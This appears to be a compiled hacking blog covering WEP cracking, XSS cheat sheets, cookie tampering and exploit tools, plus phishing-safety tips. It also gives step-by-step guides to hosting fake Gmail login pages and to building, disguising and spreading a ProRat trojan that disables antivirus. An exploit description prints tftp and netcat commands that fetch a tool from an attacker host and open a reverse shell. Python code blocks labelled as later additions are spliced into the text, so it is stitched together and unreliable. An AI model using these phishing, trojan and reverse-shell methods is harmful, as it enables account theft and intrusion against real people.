Get the HACK out of here!

The more I think of Hacking, the more I'm convinced that nothing is Secure in this world. From your computer systems to the cell phone on which you just texted, every system can fall down to one simple vulnerability or loophole, which was left in your gadget box by its developer. The only way to secure your information is by not turning on your gizmo.
Hacking is not a matter of chance, it is actually a lot of hard work done by a destructive mind. Well then what exactly do we mean by Ethical Hacking? The answer to this is simple, the hacking done in Ethics. But most of the people are confused by this sentence. All they ask me is how could Hacking be done in an Ethical way? Guys, hacking is never ethical, it's just the intention with which it is done. If the intention is positive, then it's penetration testing, done in a supervised manner, to avoid malicious Hacking. But, if the intentions are negative, then it's malicious hacking. But being a hacker, I know this thing that nobody in my field has a white collar.
People using software for hacking or extracting information out of a person's computer are not really hackers. That could be done by anybody, by just downloading any of the freely and easily available software on the internet. These people are "script kiddies", who either are attention seekers or just have some small malicious intents. India doesn't have a very strong background in hacking, as there haven't been many of these "Hackers". But here we are still struggling to make a job out of this.

Regards,
Ishan Chandra
[http://about.me/ishaanchandra]

Cracking Wireless Networks: How to Crack WEP or WPA Secured Networks

The video shows how to crack WEP- or WPA-secured networks. It also shows how to prevent people from cracking your wireless network(s).


---Do you want to share your views? Just leave a comment here. You can also drop an email to ishanchandra@ymail.com

Free Download WiFi Slax Wireless Hacking Live CD v3.1 + Plug-ins,Updated



WEP is an encryption scheme based on the RC4 cipher that is available on all 802.11a, b and g wireless products. WEP uses a set of bits called a key to scramble the information in data frames as they leave the access point or client adapter; the receiver then decrypts the scrambled message. Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long.

A semi-random 24-bit number called an Initialization Vector (IV) is part of the key, so a 64-bit WEP key actually contains only 40 bits of strong encryption while a 128-bit key has 104. The IV is placed in each encrypted frame's header and is transmitted in plain text.

Traditionally, cracking WEP keys has been a slow and boring process. An attacker would have to capture hundreds of thousands or millions of packets, a process that could take hours or even days depending on the volume of traffic passing over the wireless network. After enough packets were captured, a WEP cracking program such as Aircrack would be used to find the WEP key.
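The key arithmetic described above, as an added Python example that is not part of the original post or of any tool it mentions. It builds the per-frame RC4 seed from the cleartext IV and the shared secret, shows that frames with the same IV are encrypted under the same keystream, and estimates how soon a 24-bit IV repeats. The function names and the sample key and IVs are constructed for illustration.

```python
"""WEP per-frame keying: what the 24-bit cleartext IV means for the key."""
import math
from collections import Counter

IV_BITS = 24  # length of the WEP IV, sent unencrypted in every frame header


def secret_bits(advertised_bits):
    """Advertised WEP key size minus the public IV = bits that are secret."""
    return advertised_bits - IV_BITS


def wep_seed(iv, secret_key):
    """Per-frame RC4 seed: the 3-byte IV followed by the shared secret."""
    if len(iv) != IV_BITS // 8:
        raise ValueError("WEP IV must be 3 bytes")
    if len(secret_key) not in (5, 13):
        raise ValueError("secret must be 5 bytes (64-bit) or 13 bytes (128-bit)")
    return iv + secret_key


def rc4_keystream(seed, length):
    """Standard RC4 (key scheduling, then output generation)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + seed[i % len(seed)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def same_keystream(iv_a, iv_b, secret_key, length=16):
    """True when two frames would be encrypted with identical keystream."""
    a = rc4_keystream(wep_seed(iv_a, secret_key), length)
    b = rc4_keystream(wep_seed(iv_b, secret_key), length)
    return a == b


def frames_until_iv_collision(probability=0.5):
    """Birthday estimate: frames with random IVs before a repeat is this likely."""
    space = 2 ** IV_BITS
    return math.ceil(math.sqrt(2 * space * math.log(1 / (1 - probability))))


def reused_ivs(frame_ivs):
    """IVs that appear more than once in a list of observed frame IVs."""
    counts = Counter(frame_ivs)
    return sorted(iv for iv, n in counts.items() if n > 1)


if __name__ == "__main__":
    key = bytes.fromhex("0102030405")  # constructed 40-bit secret
    observed = [b"\x00\x00\x01", b"\x00\x00\x02", b"\x00\x00\x01"]  # constructed
    print("secret bits in a 64-bit key:", secret_bits(64))
    print("secret bits in a 128-bit key:", secret_bits(128))
    print("same IV, same keystream:", same_keystream(observed[0], observed[2], key))
    print("frames for a 50% chance of IV repeat:", frames_until_iv_collision())
    print("reused IVs:", reused_ivs(observed))
```

Because the secret half of the seed never changes, the IV is the only thing separating one frame's keystream from another's, which is why WPA2 or WPA3 should be used instead of WEP.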

Basic Directions:

1) Boot from CD
2) Get the WEP Key
3) Write it down
4) Reboot into Windows
5) Connect using WEP Key.

Boost Your Wi-Fi Signals With Beer Cans

I love a good hack, especially one that requires me to throw back a cold one beforehand (or during). This simple wifi boost has actually been shown to increase signal strength by at least 2 to 4 bars. And, well, I will drink to that.
These instructions came to us via The Chive and we think they are most definitely worth checking out. But here is the most important question: what kind of beer will you use?
For this project you are going to need scissors, a utility knife, some adhesive putty and an empty beer can. More than one empty beer can is acceptable but don’t kid yourself, the router only needs the one.
The first step is to wash out your empty beer can, unless of course said beer is a can of Pabst Blue Ribbon. If it is PBR, promptly go drink a better beer. You really should be ashamed of yourself.
Once the can has dried, you will want to remove its pull tab.
Only perform this next step if you have not been drinking. Using the utility knife, saw off the bottom of the can. Chances are your can will not have a red dotted line. If you see one, put down the knife…you’ve had too much beer.

You’ll notice in the above step that the can’s pull tab has returned. Clearly, there are only two possible reasons for this. One, you are really drunk and you never removed the tab in the first place. Or–the more likely answer–beer cans can regenerate themselves.





It’s the home stretch! You just need to attach your modded beer can to the wifi router. Hopefully no other parts of the can have actually grown back. You now have beer-fi!
So, what kind of beer did you use?

XSS - Cross Site Scripting Cheat Sheet


XSS - Cross Site Scripting Cheat Sheet By Ishan

Note for you people: XSS is Cross Site Scripting. If you don't know how XSS (Cross Site Scripting) works, this page probably won't help you. This page is for people who already understand the basics of XSS attacks but want a deep understanding of the nuances regarding filter evasion. This page will also not show you how to mitigate XSS vectors or how to write the actual cookie/credential stealing/replay/session riding portion of the attack. It will simply show the underlying methodology and you can infer the rest. Also, please note my XSS page has been replicated by the OWASP 2.0 Guide in the Appendix section. However, because this is a living document I suggest you continue to use this site to stay up to date.

Also, please note that most of these cross site scripting vectors have been tested in the browsers listed at the bottom of the page, however, if you have specific concerns about outdated or obscure versions please download them from Evolt. Please see the XML format of the XSS Cheat Sheet if you intend to use CAL9000 or other automated tools. If you have an RSS reader feel free to subscribe to the Web Application Security RSS feed below, or join the forum:

Click here for XSS (Cross Site Scripting) CHEAT SHEET


XSS Cheat Sheet by Valentin

Here you find my custom XSS and CSRF cheat sheet. I know that there are many good cheat sheets out there, but since some of them are offline from time to time, I decided to create a little collection of useful XSS stuff. I added some stuff from other well known cheat sheets (e.g. from http://ha.ckers.org/xss.html), please scroll down to see a complete list of sources.

These XSS codes can be used to test your own website for XSS/CSRF vulnerabilities. Some of them even can be used to bypass various XSS/CSRF filters. I did not include any details or explanations since I assume you are experienced with this type of vulnerability and know what you are doing.

What is a Cookie?


Persistent vs. Non-Persistent

Persistent cookies are stored in a text file (cookies.txt under Netscape and multiple *.txt files for Internet Explorer) on the client and are valid for as long as the expiry date is set for (see below). Non-Persistent cookies are stored in RAM on the client and are destroyed when the browser is closed or the cookie is explicitly killed by a log-off script.

Secure vs. Non-Secure

Secure cookies can only be sent over HTTPS (SSL). Non-Secure cookies can be sent over HTTPS or regular HTTP. The title of secure is somewhat misleading. It only provides transport security. Any data sent to the client should be considered under the total control of the end user, regardless of the transport mechanism in use.
Cookies can be set using two main methods, HTTP headers and JavaScript. JavaScript is becoming a popular way to set and read cookies as some proxies will filter cookies set as part of an HTTP response header. Cookies enable a server and browser to pass information among themselves between sessions. Remembering that HTTP is stateless, this may simply be between requests for documents in the same session or even when a user requests an image embedded in a page. It is rather like a server stamping a client and saying "show this to me next time you come in". Cookies cannot be shared (read or written) across DNS domains.
In correct client operation Domain A can't read Domain B's cookies, but there have been many vulnerabilities in popular web clients which have allowed exactly this. Under HTTP the server responds to a request with an extra header. This header tells the client to add this information to the client's cookies file or store the information in RAM. After this, all requests to that URL from the browser will include the cookie information as an extra header in the request.

Cookie Structure

domain: The website domain that created and that can read the variable.
flag: A TRUE/FALSE value indicating whether all machines within a given domain can access the variable.
path: The path attribute supplies a URL range for which the cookie is valid. If path is set to /reference, the cookie will be sent for URLs in /reference as well as sub-directories such as /reference/web protocols. A pathname of "/" indicates that the cookie will be used for all URLs at the site from which the cookie originated.
secure: A TRUE/FALSE value indicating if an SSL connection with the domain is needed to access the variable.
expiration: The time that the variable will expire on. Omitting the expiration date signals to the browser to store the cookie only in memory; it will be erased when the browser is closed.
name: The name of the variable (in this case Apache).
The limit on the size of each cookie (name and value combined) is 4 KB. A maximum of 20 cookies per server or domain is allowed.
Cookies are the preferred method to maintain state in HTTP protocol. They are however also used as a convenient mechanism to store user preferences and other data including session tokens. Both persistent and non-persistent cookies, secure or insecure can be modified by the client and sent to the server with URL requests. Therefore any attacker can modify cookie content to his advantage. There is a popular misconception that non-persistent cookies cannot be modified but this is not true; tools like Winhex are freely available. SSL also only protects the cookie in transit.
The extent of cookie manipulation depends on what the cookie is used for but usually ranges from session tokens to arrays that make authorization decisions.
An example from the real world:
Cookie: lang=en-us; ADMIN=no; y=1; time=10:30GMT;
The attacker can simply modify the cookie to:
Cookie: lang=en-us; ADMIN=yes; y=1; time=12:30GMT;
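The cookie edit above succeeds only when the server believes whatever the client sends back. The following added Python example (not code from the original post) puts a check that trusts the ADMIN field next to one that rejects any cookie whose HMAC does not verify. SERVER_KEY, the sig field name and the function names are assumptions made for illustration.

```python
"""Cookie tampering: a trusting check beside an integrity-checked one."""
import hashlib
import hmac

SERVER_KEY = b"constructed-demo-key"  # assumption: real keys live in a secret store
SIG_FIELD = "sig"                     # hypothetical name for the MAC field


def parse_cookie_header(header):
    """Turn 'Cookie: a=1; b=2;' (or just 'a=1; b=2') into a dict."""
    value = header.split(":", 1)[1] if header.lower().startswith("cookie:") else header
    fields = {}
    for part in value.split(";"):
        name, sep, val = part.strip().partition("=")
        if sep and name:
            fields[name] = val
    return fields


def is_admin_naive(header):
    """The 'before': authorization decided by a client-controlled field."""
    return parse_cookie_header(header).get("ADMIN") == "yes"


def _mac(fields):
    # Canonical form: fields sorted by name, so field order cannot change the MAC.
    canonical = ";".join(f"{k}={fields[k]}" for k in sorted(fields)).encode()
    return hmac.new(SERVER_KEY, canonical, hashlib.sha256).hexdigest()


def cookie_header_for(fields):
    """Build the header a browser would send back, with a server-computed MAC."""
    for k, v in fields.items():
        if any(c in k + v for c in ";=\r\n"):
            raise ValueError("field names and values must not contain ; = CR LF")
    signed = dict(fields)
    signed[SIG_FIELD] = _mac(fields)
    return "Cookie: " + "; ".join(f"{k}={v}" for k, v in signed.items())


def verified_fields(header):
    """Return the fields only if the MAC matches; None for any modified cookie."""
    fields = parse_cookie_header(header)
    presented = fields.pop(SIG_FIELD, "")
    if not hmac.compare_digest(presented.encode(), _mac(fields).encode()):
        return None
    return fields


def is_admin_checked(header):
    """The 'after': the ADMIN field counts only when the cookie is unmodified."""
    fields = verified_fields(header)
    return fields is not None and fields.get("ADMIN") == "yes"


if __name__ == "__main__":
    issued = cookie_header_for(
        {"lang": "en-us", "ADMIN": "no", "y": "1", "time": "10:30GMT"}
    )
    tampered = issued.replace("ADMIN=no", "ADMIN=yes")
    print("naive check, tampered cookie:  ", is_admin_naive(tampered))
    print("checked, tampered cookie:      ", is_admin_checked(tampered))
    print("checked, untouched cookie:     ", is_admin_checked(issued))
```

A MAC gives integrity only: the values stay readable and a captured cookie can be replayed. Keeping the authorization decision in server-side session state, keyed by a random session identifier, avoids sending it to the client at all.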
Hacking Tool: Helpme2.pl
  • Helpme2.pl is an exploit code for WinHelp32.exe Remote Buffer Overrun vulnerability.
  • This tool generates an HTML file with a given hidden command.
  • When this HTML file is sent to a victim through e mail, it infects the victim's computer and executes the hidden code.

Helpme2.pl is exploit code written to take advantage of the winhelp32.exe vulnerability. The Perl script takes a command to execute (WinExec, SW_HIDE) and gives an HTML output file. There are two versions:

HelpMe.pl was written to work with kernel32.dll version 5.0.2195.4272, while HelpMe2.pl was written to work with kernel32.dll version 5.0.2195.2778
The exploit does the following:
  1. Executes tftp.exe-i attacker.ip.address get nc.exe c: \winnt\system32\nc.exe
  2. Executes nc.exe attacker.ip.address 80-e cmd.exe
Hacking Tool: WindowBomb


An email sent with such html files attached will create pop-up windows until the PC's memory gets exhausted.
Window bombs are code written to cause annoying behavior on the user's computer screen. Examples that have been seen include:

Deadly image
A GIF which crashes the browser on clicking.
Uncloseable window
Opens a document that utilizes the JavaScript Unload event handler to reopen the document if you try to leave or close the window.
Invincible alert dialogue
Executes a function which generates an alert dialogue and then runs the function again
Reload-o-rama
Refreshes the document from the history 1000 times/second, leaving the back and stop buttons useless.
Window spawner
Continuously opens new windows until the ram or swap space is full.
Jiggy window
Causes the window to dance around on the screen so fast that the controls cannot be reached.
Jiggy window spawner
Creates an endless stream of little dancing windows.
While loop processor hog
Executes an endless loop to chew up some processor time.
Recursive frames
Opens a set of recursive frames until the ram or swap space is full.
Memory bomb
Dynamically allocates ram to the browser until the ram or swap space is full.
Super memory bomb
Opens a 100K document with numerous recursive tables and ordered lists.
Hacking Tool: IEEN
  • IEEN remotely controls Internet Explorer using DCOM.
  • If you know the account name and the password of a remote machine, you can remotely control the software components on it using DCOM. For example, Internet Explorer is one of the software components that can be controlled.
IEEN: The Distributed Component Object Model (DCOM) is a protocol that enables software components to communicate directly over a network in a reliable, secure, and efficient manner. DCOM is installed on most Windows machines by default and runs without being noticed by users.
However, if an attacker knew the account name and the password of a remote machine, he can remotely control the software component on it using DCOM. For example, Internet Explorer is one of the software components that can be controlled. IE'en is a tool that can be used to remotely control Internet Explorer using DCOM.
Summary of IE'en Functionalities:
  • Remotely connects to or activates Internet Explorer
  • Captures data sent and received using Internet Explorer
  • Even on SSL encrypted websites (e.g. Hotmail); IE'en can capture user ID and password in plain text.
  • Change the web page on the remote IE window.
  • Make the remote IE window visible / invisible
---------------------------------------------------------------------------------------------

Summary
  • Attacking web applications is the easiest way to compromise hosts, networks and users.
  • Generally nobody notices web application penetration, until serious damage has been done.
  • Web application vulnerabilities can be eliminated to a great extent by ensuring proper design specifications and coding practices as well as implementing common security procedures.
  • Various tools help the attacker to view the source codes and scan for security holes.
  • The first rule in web application development from a security standpoint is not to rely on the client side data for critical processes. Using an encrypted session such as SSL / "secure" cookies are advocated instead of using hidden fields, which are easily manipulated by attackers.
  • A cross-site scripting vulnerability is caused by the failure of a web based application to validate user supplied input before returning it to the client system.
  • If the application accepts only expected input, then the XSS can be significantly reduced.

    Regards,

    Ishan Chandra

Download Free Internet Explorer Cookie Forensic Analysis Tool: GALLETA


Many important files within Microsoft Windows have structures that are undocumented. One of the principles of computer forensics is that all analysis methodologies must be well documented and repeatable, and they must have an acceptable margin of error. Currently, there is a lack of open source methods and tools that forensic analysts can rely upon to examine the data found in proprietary Microsoft files.

Many computer crime investigations require the reconstruction of a subject's Internet Explorer Cookie files. Since this analysis technique is executed regularly, we researched the structure of the data found in the cookie files. Galleta, the Spanish word meaning "cookie", was developed to examine the contents of the cookie files. The foundation of Galleta's examination methodology will be documented in an upcoming whitepaper. Galleta will parse the information in a Cookie file and output the results in a field delimited manner so that it may be imported into your favorite spreadsheet program. Galleta is built to work on multiple platforms and will execute on Windows (through Cygwin), Mac OS X, Linux, and *BSD platforms.

Usage: galleta [options]
-t Field Delimiter (TAB by default)

Example Usage:

[kjones:galleta/galleta_20030410_1/bin] kjones% ./galleta antihackertoolkit.txt > cookies.txt

Open cookies.txt as a TAB-delimited file in MS Excel to further sort and filter your results.


SOURCE: http://www.foundstone.com

Learn How to Collect and Analyze Cookies Using COOKIEDIGGER


CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications. The tool works by collecting and analyzing cookies issued by a web application for multiple users. The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, is included in the cookie values.


SOURCE: http://www.foundstone.com
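The kind of check described above can be run against your own application's test accounts. The following Python code is an added example, not CookieDigger's code or algorithm: it takes cookies issued to several users and reports character entropy, how much of the value never changes between users, whether the values form a counter, and whether a user name or password appears in the value directly or after URL, base64 or hex decoding. All account names, passwords and cookie values are constructed.

```python
"""Session-cookie quality checks over cookies issued to several test users."""
import base64
import binascii
import math
from collections import Counter
from urllib.parse import unquote


def bits_per_char(values):
    """Shannon entropy (bits per character) of the characters in all values."""
    pool = Counter("".join(values))
    total = sum(pool.values())
    if not total:
        return 0.0
    return -sum(n / total * math.log2(n / total) for n in pool.values())


def constant_fraction(values):
    """Share of character positions that are identical for every user."""
    width = min(len(v) for v in values)
    if width == 0:
        return 0.0
    same = sum(1 for i in range(width) if len({v[i] for v in values}) == 1)
    return same / width


def is_sequential(values):
    """True if the values are integers separated by one fixed step (a counter)."""
    if len(values) < 3 or not all(v.isascii() and v.isdigit() for v in values):
        return False
    nums = [int(v) for v in values]
    steps = {b - a for a, b in zip(nums, nums[1:])}
    return len(steps) == 1 and steps != {0}


def decodings(value):
    """The raw value plus its URL-, base64- and hex-decoded forms where valid."""
    forms = {value, unquote(value)}
    try:
        padded = value + "=" * (-len(value) % 4)
        forms.add(base64.b64decode(padded, validate=True).decode("utf-8"))
    except (binascii.Error, ValueError):
        pass
    try:
        forms.add(bytes.fromhex(value).decode("utf-8"))
    except ValueError:
        pass
    return forms


def leaked_credentials(value, credentials):
    """Which of the known credential strings show up in any decoding."""
    forms = [f.lower() for f in decodings(value)]
    return sorted(c for c in credentials if c and any(c.lower() in f for f in forms))


def analyze(samples):
    """samples: (username, password, cookie_value) tuples from test accounts."""
    values = [v for _, _, v in samples]
    leaks = {u: leaked_credentials(v, [u, p]) for u, p, v in samples}
    return {
        "bits_per_char": round(bits_per_char(values), 2),
        "constant_fraction": round(constant_fraction(values), 2),
        "sequential": is_sequential(values),
        "leaks": {u: found for u, found in leaks.items() if found},
    }


# Constructed sample sets: a counter, encoded credentials, and random tokens.
COUNTER_COOKIES = [("alice", "pw-alice", "100231"), ("bob", "pw-bob", "100232"),
                   ("carol", "pw-carol", "100233")]
LEAKY_COOKIES = [(u, p, base64.b64encode(f"{u}:{p}".encode()).decode())
                 for u, p in [("alice", "s3cret!"), ("bob", "hunter2x"),
                              ("carol", "Tr0ub4dor")]]
RANDOM_COOKIES = [("alice", "pw-alice", "9f2c4be17a03d85e6b1fa47c20d93e58"),
                  ("bob", "pw-bob", "41d7a8063fce925b0e7413bd86a5f2c9"),
                  ("carol", "pw-carol", "c8053e9fb1a6472d5093fd68e27b14a0")]

if __name__ == "__main__":
    for label, data in [("counter", COUNTER_COOKIES), ("leaky", LEAKY_COOKIES),
                        ("random", RANDOM_COOKIES)]:
        print(label, analyze(data))
```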

What are Web Beacons OR Web Bugs?


Web beacons, also called web bugs and clear GIFs are used in combination with cookies to help people running websites to understand the behaviour of their customers. A web beacon is typically a transparent graphic image (usually 1 pixel x 1 pixel) that is placed on a site or in an email.

The use of a web beacon allows the site to record the simple action of the user opening the page that contains the beacon. The beacon is one of the ingredients of the page, just like other images and text, except it is so small and clear that it is effectively invisible. Web pages and graphical emails use presentation code that tells your computer what to do when a page is opened. While they may contain some of the text that you see on the screen at the time, they typically contain a number of instructions, or 'tags', that then ask the website's server to send you further content (such as an image or a block of text that changes frequently). Web beacons are retrieved in the same way, and the action of calling the material from another server allows the event to be counted.

When a user's browser requests information from a website in this way certain simple information can also be gathered, such as: the IP address of your computer; time the material was viewed; the type of browser that retrieved the image; and the existence of cookies previously set by that server. This is information that is available to any web server you visit. Web beacons do not give any "extra" information away. They are simply a convenient way of gathering the simplest of statistics and managing cookies.

Web beacons are typically used by a third party to monitor the activity of a site. Turning off the browser's cookies will prevent web beacons from tracking your specific activity. The web beacon may still record an anonymous visit from your IP address, but unique information will not be recorded.

For example a company owning a network of sites may use web beacons in order to count and recognise users travelling around its network. Rather than gathering statistics and managing cookies on all their servers separately, they can use web beacons to keep them all together. Being able to recognise you enables the site owner to personalise your visit and make it more user friendly.

Why do websites use Web Beacons?

Web beacons are used by website owners to log activity on their web pages and websites. Their purpose depends on what a site wants to understand about how visitors interact with pages. To see a demonstration of how web beacons work, CLICK HERE.

Cookies are bad for privacy - Is that true?


This is a myth - cookies are a friendly internet tool primarily used by the advertising and e-commerce industry to make surfing easier and quicker. They have several roles, none of which can compromise your privacy:
  1. Protection - to ensure you are a genuine visitor and not someone else using your password.
  2. Authenticate and speed up your identification and e-commerce transactions.
  3. Recognise preferences e.g. remember user names and passwords for websites.
  4. Cap the frequency of ad serving and make sure that advertisements are rotated and not duplicated during any one visit to a site.
Many websites use the services of other companies to provide the content and services on their website. These third parties may provide content or services to more than one website. If they are using cookies, in theory, they can understand what that cookie does on a number of different sites.

Protection Against Phishing Attacks: Learn How to Protect Yourself


  1. Never click on Hyperlinks within emails, instead, copy and paste them into your browser
  2. Use SPAM Filter Software
  3. Use Anti-Virus Software
  4. Use a Personal Firewall
  5. Keep Software Updated (operating systems and web browsers)
  6. Always look for "https://" and padlock on web sites that require personal information
  7. Keep your computer clean from Spyware
  8. Educate Yourself about fraudulent activity on the Internet
  9. Check & monitor your credit report
  10. Seek Advice - if you are unsure, ask us: scams@fraudwatchinternational.com
For more detailed explanations on phishing and how to protect yourself visit:
The Fight Against Phishing: 44 Ways to Protect Yourself:

Simple, but effective…

1. Never trust strangers: The same rules you were taught as a child come into play here; DO NOT open emails that are from people you don’t know. Set your junk and spam mail filter to deliver only content from those in your address book.

2. Sidestep those links: What happens if your spam filter is fooled into delivering junk mail to your inbox, and you happen to open it? Simple – NEVER click on links embedded in your email.

3. Guard your privacy: Your mouse just happened to move over the link and lo and behold, you’re transported to another website where you’re asked to provide sensitive information like user names, account numbers, password and credit card and social security numbers. Just one word for you - DON’T.

4. Fear Not: More often than not, these phony websites come with threats or warnings that your account is in danger of being deactivated if you don’t confirm your user information, or that the IRS is due to pay you a visit if you don’t comply with what’s written on the page. Just IGNORE them.

5. Pick up the phone and call: If you are in doubt that it just may be a legitimate request, and that your bank is actually asking you to reveal sensitive information online, CALL your customer service representative before you do anything foolhardy.

6. Use the keypad, not the mouse: TYPE in URLs instead of clicking on links to online shopping and banking sites that typically ask for credit card and account numbers.

7. Look for the lock: Valid sites that use encryption to securely transfer sensitive information are characterized by a lock on the bottom right of your browser window, NOT your web page. They also have addresses that begin with https:// rather than the usual http://.

8. Spot the difference: Sometimes, just the presence of the lock alone is proof enough that the site is authentic. To verify its genuineness, double-click the lock to display the site’s security certificate, and CHECK if the name on the certificate and the address bar match. If they don’t you’re on a problem site, so get the hell out of there.

9. Second time right: If you’re worried that you’ve reached a phishing site that’s masquerading as your banking page, sometimes the easiest way to check is to enter a WRONG password. The fake site will accept it, and then you’re usually redirected to a page that says they’re having technical difficulties, so could you please check back later? Your original banking site will not allow you entry.

10. Different is the keyword here: Use DIFFERENT passwords for different sites; I know it’s a tough ask these days when most functions of the brain are being passed on to technology, but this is a good way to prevent phishers from getting at all your sensitive transactions, even if they’ve managed to compromise one.

Income Tax Phishing Site- Beware


The above is one of the mails you may receive in your mailbox, which will redirect you to the page below. BEWARE.
In the Tax Refund Online Form, all fields were compulsory to be filled, like card number, bank account details, credit card CVV number, ATM PIN etc.


See the web address of FAKE SITE (PHISHING SITE)

This is the official website of the Income Tax Department of India; see the difference


NEVER EVER GIVE YOUR DEBIT / CREDIT CARD CVV / CVV2 and EXPIRY DATE TO ANYONE, NOT EVEN TO THE BANK OR A GOVERNMENT OFFICIAL NEITHER ON PHONE OR ONLINE FORM or IN ANY FORM

Beware of Phishing sites. It can cost you all your money.

Download Login Spoofer 2010: Hack Yahoo Account Passwords: Facebook Passwords Hacking


Download Login Spoofer 2010: Yahoo Password Hacking: Hotmail Password Hacking: Gmail Password Hacking: Facebook Password Hacking & Many more..!!


Login Spoofer is a Software that it can create Professional Phishing Pages Like: (Hotmail, Yahoo, Gmail, GameZer, Facebook and many more ....) to Steal somebody's Account you have to push him to login in one of your fake pages, when the Victim Login as you told him, His account (Username/Password) will register in our database So you go to the software (Login spoofer) and press refresh then you'll find His Username & Password & IP & his OS Info...etc. Using and Downloading is free 100%.
  • Yahoo Password Hacking: Hack Yahoo Account Password with phishing attack.
  • Hotmail Password Hacking: Hack Hotmail Account Password with phishing attack.
  • Gmail Password Hacking: Hack Gmail Account Password with phishing attack.
  • GameZer Password Hacking: Hack GameZer Account Password with phishing attack.
  • Facebook Password Hacking: Hack Facebook Account Password with phishing attack..& many more..!!
Download Login Spoofer 2010: DOWNLOAD HERE

Hack Gmail: How to Hack Gmail Account Password Using PRORAT Trojan & Phishing Attack


How to Hack Gmail Account Password

Note: This below mentioned methods are used to Hack Gmail Account Password. These methods can also be used to hack any other email account. I have just demonstrated it on how to hack Gmail Account Password.


METHOD-1: How to Hack Gmail Account Passwords Using Phishing Attack


Step 1: Download Gmail fake login page and extract the contents into a folder. Visit here to download GMAIL FAKE PAGE

Step 2: Create your free account at www.t35.com, www.110mb.com or www.ripway.com and upload the extract files here.

Step 3: I have uploaded all files at t35.com. Simply upload all the extracted files here.

Step 4: Open you fake page, enter user name and password and try out whether its working. You fake page will be located at http://yoursitename.t35.com/Gmail.htm

Step 5: A password file will be created in the same directory and you can check it at http://yoursitename.t35.com/GmailPasswords.htm.

Now you are ready to hack Gmail accounts password. If you face any problem, post your comments here.
This post is for educational purpose only. www.freehacking.net holds no responsibility how you are using the downloaded files.

METHOD-2: How to Hack Gmail Account Passwords Using Trojans & Keyloggers

Here I am demonstrating using PRORAT trojan. You can also check the list of trojans & Keyloggers here which I have already posted few months back. You can use any trojan or keylogger as per your ease. The basic functionality of all backdoors are same. Pls make note that all these hacking tools and softwares are detected by antivirus. You have to uninstall or close you running antivirus first. I strictly recommend you to try these trojans & keyloggers on some testing system first.

Step-1: Download latest version of ProRat v1.9 Fix2. CLICK HERE to download. The ZipPass is : pro

STEP-2: Creating the ProRat server. Click on the "Create" button in the bottom. Choose "Create ProRat Server".

STEP-3: Open Notifications. Select second option "Mail Notification". In the E-MAIL field you will see a mail
id: bomberman@yahoo.com. Remove this mail ID and give your own mail id here. You will receive a notification
email on this email id whenever you victim will be connected to internet from the infected system.

STEP-4: Open General settings. This tab is the most important tab. In the check boxes. here is a quick overview
of what they mean and which should be checked.

Key:

[ ] = dont check
[x] = check

[ ] Give a Fake Error Message. (when they open the file, it gives an error message.
[x] Melt server on install. (this will cause the server to ALWAYS connect to the internet when the victim gets
online)
[x] Kill AV - FW on Install. (this causes the anti-virus and firewalls to SHUT DOWN and stay off once installed
on the victim's computer.
[x] Disable Windows XP SP2 security center
[x] Disable Windows XP Firewall
[x] Clear Windows XP Restore Points
[ ] Dont send LAN notifications ( keeps other computers on the victim's network from knowing about you )
[ ] Protection for removing local server

In the Invisibility Box, check all 4 boxes.

STEP-5: Open Bind With File. You can bind your server\downloader server with a file that you want. You must
click on the ''Bind the server with a file'' button and then the file button will be activated. You can choose
a file to be binded with the server now. A good suggestion is a picture because that is a small file and its
easer to send to the people you need.

STEP-6: Open Server Extensions. I prefer using .exe files, because it is cryptable. Mostly crypters don't
support .bat/.pif/.com etc. So use .exe files.

STEP-7: Open Server Icon. You can select the one you want to use with the server from the small pictures on the
menu. You can use an icon from your computer also. Press the "Choose new icon" button.

STEP-8: After this, press "Create server", your server will be in the same folder as ProRat. A new file with
name "binded_server" will be created. Rename this file to something describing the picture.

[NOTE: PLS DO NOT OPEN THE FILE "binded_server" on your system.]

STEP-9: Sending this file "binded_server" to victim. You can send this trojan server via email, pendrive or if
you have physical access to the system, go and run the file.

From EMAIL, you can not send this file as it is because it will be detected as TROJAN OR VIRUS. Password protect this file with
ZIP and then email it. Once your victime download this ZIP file, ask him to unlock it using ZIP password. When
the victim will double click on the file, he will be in your control.

STEP-10: Connecting to the victim's computer. Once the server has been sent and the person has opened this ZIP
folder, they will now be infected with it. AND HAVE NO CLUE ABOUT IT!. On the top of the ProRat program you
will see a box in the upper left corner. Type in the victim's IP address and make sure the port is 5110. Now
press Connect. You should now see a pop-up box wanting to know a password. Remember the password you entered
while creating the server? that is what you need to type. By default, it is "123456" without quotes.

STEP-11: Check your email, (junk in needed), and find the “Your victim is online”. Copy and paste the IP
address onto ProRat where it says “IP:[127.0.0.1]“. Press CONNECT, DO NOT CHANGE THE PORT, if u did change it
back to 5110. Type in the password (default is usually 123456, it is in the email). Your done, now you can mess
with the buttons on the program. Especially the GIVE DAMAGE button. It will damage their pc by format, and will
make the computer useless.

FAQ:

Q: Error message: Windows cannot access the specified device, path, or file. You may not have the appropriate
permissions to access the item. What do I do?
A: Simple! Delete the ProRat program. Delete it. What happened was, your AV has altered the file. OR it could be
malicious content. Either way, delete it. NEXT, remember the file you downloaded? Un extract the file again and
re run. You will not need to remake a server file and such if it has been sent to the victim. Just open ProRat
and make sure your AV is shut off. Reconnect. There ya go.

Q: What operating systems are supported by ProRat?
A: Windows 95/95B
Windows 98/98SE
Windows ME
Windows NT 4.0
Windows 2000
Windows XP
Windows Vista

Q: When I have downloaded ProRat, my antivirus detect it as virus. What should I do?
A: Well, since RATs are hacktools, and all the hack tools are detected as viruses, ProRat is detected as virus
also. To download and install ProRat you will need to turn off your anti-virus.

Q: What should I do after I install my server?
A: After you install your server, you should spread it. A few years back I installed my server manually in
1000's of cyber cafes in my city. I hacked almost the entire city's cafe users' secret information. This is the
best way. Go to the nearest cyber cafes and manually install your trojan server.

Q: I've created a server, but I don't see it in the directory. Why?
A: That's caused by your antivirus. The server is detected, and it won't let it. I suggest you to remove your
antivirus if you are going to use RATs.

Q: I've send my server to a friend on MSN, but he doesn't connect.
A: That's because he has an antivirus or firewall and it won't let him connect to your RAT. To make it
FUD (Fully Undetectable), you should use a crypter.

Q: Is ProRat illegal?
